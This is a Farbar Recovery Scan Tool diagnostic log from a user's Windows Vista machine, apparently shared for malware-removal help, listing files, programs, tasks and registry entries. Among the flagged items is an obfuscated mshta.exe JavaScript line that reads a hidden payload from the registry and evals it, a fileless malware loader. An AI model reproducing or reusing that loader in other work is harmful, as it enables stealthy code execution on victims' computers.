2016-08-02 10:29 - 2016-04-25 17:59 - 00000000 ____D C:\Users\Scott\AppData\Roaming\EPSON
2016-08-01 23:04 - 2016-04-05 20:48 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2016-08-01 23:04 - 2016-04-05 20:48 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2016-08-01 22:28 - 2016-04-05 19:52 - 00000000 ____D C:\Users\Scott\AppData\Local\Apps\2.0
2016-08-01 22:09 - 2010-12-25 13:40 - 00000000 ____D C:\ProgramData\Apple Computer
2016-08-01 20:00 - 2014-12-05 04:42 - 00000850 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-08-01 12:16 - 2014-12-11 01:17 - 00000000 ____D C:\Qoobox
2016-08-01 07:43 - 2016-03-30 21:15 - 00000446 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2016-07-31 22:33 - 2016-04-01 00:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-07-31 22:33 - 2014-12-25 01:18 - 00000000 ____D C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-07-31 22:08 - 2016-04-03 10:00 - 00000000 ____D C:\Users\Scott\Documents\BLOG
2016-07-31 21:29 - 2016-03-30 21:14 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-07-31 21:29 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\system32\spool
2016-07-31 21:29 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\registration
2016-07-31 21:29 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\inf
2016-07-31 04:15 - 2006-11-02 08:47 - 00079872 _____ C:\Windows\system32\umstartup.etl
2016-07-31 04:04 - 2006-11-02 06:23 - 00000215 _____ C:\Windows\system.ini
2016-07-30 18:36 - 2016-06-28 10:56 - 00000000 ____D C:\Program Files\Mozilla Firefox
2016-07-30 14:38 - 2006-11-11 03:41 - 00000000 ____D C:\Windows\Panther
2016-07-29 14:56 - 2016-04-03 09:16 - 00000000 ____D C:\ProgramData\McAfee
2016-07-29 10:25 - 2016-04-03 09:16 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-07-29 10:15 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\rescache
2016-07-29 09:57 - 2006-12-02 14:49 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2016-07-29 09:55 - 2006-11-02 07:18 - 00000000 ___SD C:\Windows\Downloaded Program Files
2016-07-29 09:55 - 2006-11-02 07:18 - 00000000 ___RD C:\Windows\Offline Web Pages
2016-07-29 09:55 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-07-29 08:16 - 2006-02-13 13:36 - 00000000 ____D C:\PerfLogs
2016-07-29 08:02 - 2014-12-25 00:14 - 00000000 ____D C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2016-07-29 08:02 - 2010-12-25 13:34 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-07-29 07:57 - 2006-12-05 01:09 - 00000000 ____D C:\Program Files\Common Files\NewTech Infosystems
2016-07-29 05:11 - 2016-03-30 22:32 - 00009019 _____ C:\Windows\wininit.ini
2016-07-28 09:45 - 2014-12-11 01:26 - 00000000 ____D C:\Users\Scott
2016-07-28 09:35 - 2014-12-11 01:48 - 00000808 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-07-27 03:49 - 2016-06-01 11:11 - 00001207 _____ C:\Users\Scott\Desktop\NEW STAMPS - Shortcut.lnk
2016-07-27 02:23 - 2016-03-30 21:15 - 00000616 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2016-07-26 14:24 - 2009-10-02 15:22 - 00406184 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-07-22 16:28 - 2014-12-05 05:09 - 00000000 ____D C:\Users\Scott\AppData\LocalLow\Adobe
2016-07-22 07:26 - 2006-11-02 06:23 - 00453031 ____R C:\Windows\system32\Drivers\etc\hosts.20160729-051402.backup
2016-07-19 06:41 - 2006-11-02 06:23 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160722-072520.backup
2016-07-18 22:02 - 2016-06-02 09:46 - 00002732 _____ C:\Users\Scott\Desktop\Listings.txt
2016-07-14 23:23 - 2014-12-05 04:42 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2016-07-14 23:23 - 2006-02-13 02:40 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-07-14 07:15 - 2006-11-02 06:23 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160719-064021.backup
2016-07-14 07:11 - 2014-12-02 17:58 - 00000000 ____D C:\Windows\system32\MRT
2016-07-14 03:48 - 2006-11-02 08:47 - 00392528 _____ C:\Windows\system32\FNTCACHE.DAT
2016-07-14 03:02 - 2006-11-02 06:24 - 141983760 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2016-07-12 12:09 - 2007-06-10 07:07 - 00000000 ____D C:\Windows\system32\Macromed
2016-07-10 05:04 - 2015-10-23 06:15 - 00000000 ____D C:\ProgramData\Package Cache
2016-07-10 04:12 - 2006-11-02 06:23 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160714-071424.backup
2016-07-10 03:38 - 2006-11-02 06:33 - 00758514 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-07 21:18 - 2016-04-01 00:06 - 00000796 _____ C:\Users\Public\Desktop\QuickTime Player.lnk

==================== Files in the root of some directories =======

2015-02-25 22:22 - 2016-07-31 13:23 - 0005216 _____ () C:\Users\Scott\AppData\Local\d3d9caps.dat
2014-12-25 01:24 - 2016-08-02 10:31 - 0010752 _____ () C:\Users\Scott\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2008-02-25 20:40 - 2016-04-11 01:00 - 0007849 _____ () C:\ProgramData\hpzinstall.log
2007-12-17 21:57 - 2007-12-17 22:07 - 0015116 _____ () C:\ProgramData\LUUnInstall.LiveUpdate

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-08-02 11:56

==================== End of FRST.txt ============================


Additional scan result of Farbar Recovery Scan Tool (x86) Version: 27-07-2016
Ran by Scott (2016-08-02 12:09:02)
Running from C:\Users\Scott\Downloads
Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) (2007-03-13 22:25:09)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3182237591-3162957894-2498692213-500 - Administrator - Disabled)
Guest (S-1-5-21-3182237591-3162957894-2498692213-501 - Limited - Disabled)
Scott (S-1-5-21-3182237591-3162957894-2498692213-1002 - Administrator - Enabled) => C:\Users\Scott

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

32 Bit HP CIO Components Installer (Version: 1.0.0 - Hewlett-Packard) Hidden
Acer Assist (HKLM\...\Acer Assist) (Version:  - Acer Inc.)
Acer eLock Management (HKLM\...\{116FF17B-1A30-4FC2-9B01-5BC5BD46B0B3}) (Version: 2.5.3006 - Acer Inc.)
Acer Empowering Technology (HKLM\...\{AB6097D9-D722-4987-BD9E-A076E2848EE2}) (Version: 2.5.3003 - Acer Inc.)
Acer eNet Management (HKLM\...\{C06554A1-2C1E-4D20-B613-EE62C79927CC}) (Version: 2.6.3002 - Acer Inc.)
Acer ePower Management (HKLM\...\{58E5844B-7CE2-413D-83D1-99294BF6C74F}) (Version: 2.5.3007 - Acer Inc.)
Acer ePresentation Management (HKLM\...\{BF839132-BD43-4056-ACBF-4377F4A88E2A}) (Version: 2.5.3003 - Acer Inc.)
Acer eSettings Management (HKLM\...\{CE65A9A0-9686-45C6-9098-3C9543A412F0}) (Version: 2.5.3003 - Acer Inc.)
Acer GridVista (HKLM\...\GridVista) (Version: 2.59.1123 - )
Acer Mobility Center Plug-In (HKLM\...\{11316260-6666-467B-AC34-183FCB5D4335}) (Version: 1.0.3003 - Acer Inc.)
Acer OrbiCam Application (HKLM\...\{0F79C1B2-36B2-4B62-8221-42721CF54638}) (Version: 10.40.1319 - Acer)
Acer ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.00.0000 - Acer Inc.)
Acer Tour (HKLM\...\{94389919-B0AA-4882-9BE8-9F0B004ECA35}) (Version: 1.1.3001 - Acer Inc.)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 15.0.0.356 - Adobe Systems Incorporated)
Adobe Flash Player 22 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 22.0.0.210 - Adobe Systems Incorporated)
Adobe Flash Player 22 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM\...\Adobe Shockwave Player) (Version: 12.1.5.155 - Adobe Systems, Inc.)
Agere Systems HDA Modem (HKLM\...\Agere Systems Soft Modem) (Version:  - Agere Systems)
Apple Application Support (HKLM\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{E14ADE0E-75F3-4A46-87E5-26692DD626EC}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.20 - Piriform)
EPSON Easy Photo Print (HKLM\...\{8A8F8391-4C2C-4BE1-A984-CD4A5A546467}) (Version: 1.5.1.0 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - )
EPSON WorkForce 30 Series Printer Uninstall (HKLM\...\EPSON WorkForce 30 Series) (Version:  - SEIKO EPSON Corporation)
Eraser 6.2.0.2971 (HKLM\...\{F9EA3546-8EBB-49B3-84AC-40269767562C}) (Version: 6.2.2971 - The Eraser Project)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{35C0A1E4-D02A-412C-841F-266DBB116ABB}) (Version: 12.02.0000 - Intel® Corporation)
LightScribe  1.4.124.1 (Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden
McAfee SecurityCenter (HKLM\...\MSC) (Version: 14.0.339 - McAfee, Inc.)
McAfee SiteAdvisor (HKLM\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.290 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB936181) (HKLM\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB941833) (HKLM\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My DSC (HKLM\...\{225AF9A1-B556-88D5-94AA-0010B5426419}) (Version:  - )
OpenOffice 4.1.2 (HKLM\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
QuickShare (HKLM\...\{62BC7EFB-47F5-4619-9B74-7DDA72D5AF7E}) (Version: 1.6.1.949 - Linkury Inc.) <==== ATTENTION
QuickTime 7 (HKLM\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5322 - Realtek Semiconductor Corp.)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 9.0.3.0 - Synaptics)
Texas Instruments PCIxx21/x515/xx12 drivers. (HKLM\...\InstallShield_{F7B05784-334C-4F76-8BAB-30ABEB7FD534}) (Version: 1.23.0000 - Texas Instruments Inc.)
TIPCI (Version: 1.23.0000 - Texas Instruments Inc.) Hidden
WorkForce 30 Series Info Center (HKLM\...\Silent Package Run-Time Sample) (Version:  - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002_Classes\CLSID\{BC9B776A-90D7-4476-A791-79D835F30650}\InprocServer32 -> C:\Program Files\Eraser\Eraser.Shell.dll (The Eraser Project)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {009FF3C0-2C63-45C9-9B64-43C4F90DF8E4} - System32\Tasks\LaunchSignup => C:\Program Files\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {0EA7907D-B1A0-4351-B51D-9445C6C7E3A9} - System32\Tasks\Acer\Acer Assist\New Message Check - Scott => C:\Program Files\Acer Assist\AcerAssist.exe [2006-12-07] (Acer Inc.)
Task: {1FEFB154-0FDE-406A-9A23-17F7AB5A22C3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: {46915187-2476-47E8-A559-AC136E5B9623} - \Updater26278.exe -> No File <==== ATTENTION
Task: {56359757-5AD7-41EE-8EC5-2175AA01E281} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {569BC13A-3F87-4F71-BBEF-32E92F2F5F27} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {620CA66F-41E3-47CB-BEBA-F53DCCFBE17C} - System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => pcalua.exe -a "C:\Program Files\QuickTime\QTSystem\QuickTime.cpl" -c QuickTime
Task: {69DDDA7A-BE28-4DB0-BDAE-EB8D55F222EC} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-19] (Microsoft Corporation)
Task: {7D5C45A7-F524-4CA3-AB4E-880DFFB541D0} - System32\Tasks\Scan the system (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A} - System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => pcalua.exe -a E:\setup.exe -d E:\
Task: {93996E05-B471-4434-9763-F5997EBA0E9E} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\VistaSP1CEIP => C:\Windows\servicing\vsp1ceip.exe [2008-01-19] (Microsoft Corporation)
Task: {AD03E781-944B-447D-A206-64A43CC5AEE1} - System32\Tasks\Check for updates (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {C342F60A-BA9E-49AE-83A4-9C7642C5162B} - System32\Tasks\Refresh immunization (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {D3D993CC-94EC-4AD5-9D81-A3DC156CD314} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-07-13] (Piriform Ltd)
Task: {F5CB4D98-5105-4FB0-BC7E-F5E580C020F4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-08-01] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk -> C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat ()

==================== Loaded Modules (Whitelisted) ==============

2008-10-16 17:57 - 2008-10-16 17:57 - 00200704 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2016-03-30 21:14 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-03-30 21:14 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2012-11-28 15:13 - 2012-11-28 15:13 - 00087952 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2013-06-01 12:13 - 2012-11-28 15:13 - 01242512 _____ () C:\Program Files\Common Files\Apple\Mobile Device Support\libxml2.dll
2016-03-30 21:14 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2007-03-13 18:39 - 2006-11-24 15:57 - 00107008 _____ () C:\Acer\Mobility Center\MobilityService.exe
2007-03-13 18:39 - 2006-10-24 13:54 - 00033280 _____ () C:\Acer\Mobility Center\MobilityInterface.dll
2016-03-30 21:14 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2016-03-30 21:14 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2007-06-10 07:08 - 2006-12-28 18:23 - 00016384 _____ () C:\Acer\Empowering Technology\eRecovery\ServiceInterface.dll
2007-06-10 07:08 - 2006-12-28 18:23 - 00016384 _____ () C:\Acer\Empowering Technology\eRecovery\IERYETF.dll
2007-03-13 18:39 - 2007-01-02 19:46 - 00024576 _____ () C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe
2007-03-13 18:39 - 2007-01-02 19:45 - 00114688 _____ () C:\Acer\Empowering Technology\eSettings\Service\eSettings.Model.Computer.dll
2007-03-13 18:39 - 2007-01-02 19:44 - 00032768 _____ () C:\Acer\Empowering Technology\eSettings\Service\eSettings.Model.ComputerInterfaces.dll
2016-08-01 16:09 - 2016-08-01 16:09 - 01114136 _____ () C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\support@lastpass.com\platform\WINNT_x86-msvc\components\lpxpcom.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\01433936.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\06452831.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\40692755.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42410430.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\45F8A0B2.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\71479720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\01433936.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\06452831.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\40692755.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42410430.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\45F8A0B2.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\71479720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\imageres.dll,-68 <===== ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f: "C:\Windows\system32\mshta.exe" "javascript:oB2RUH="oGt";mN71=new ActiveXObject("WScript.Shell");unRi22V="qmhHM";w0TVp=mN71.RegRead("HKCU\\software\\jiun\\thufoby");sh9jvJ="vImph";eval(w0TVp);z83FTbxB="RntD";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


There are 7913 more sites.

IE trusted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\dotpdn.com -> hxxp://www.dotpdn.com

There are 7913 more sites.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 06:23 - 2016-07-31 04:26 - 00452413 ____R C:\Windows\system32\Drivers\etc\hosts


There are 15552 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\img31.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupreg: Acer Tour Reminder => C:\Acer\AcerTour\Reminder.exe
MSCONFIG\startupreg: AcerOrbicamRibbon => "C:\Program Files\Acer\OrbiCam10\OrbiCam.exe" /hide
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: SynTPEnh => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: WindowsWelcomeCenter => rundll32.exe oobefldr.dll,ShowWelcomeCenter

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
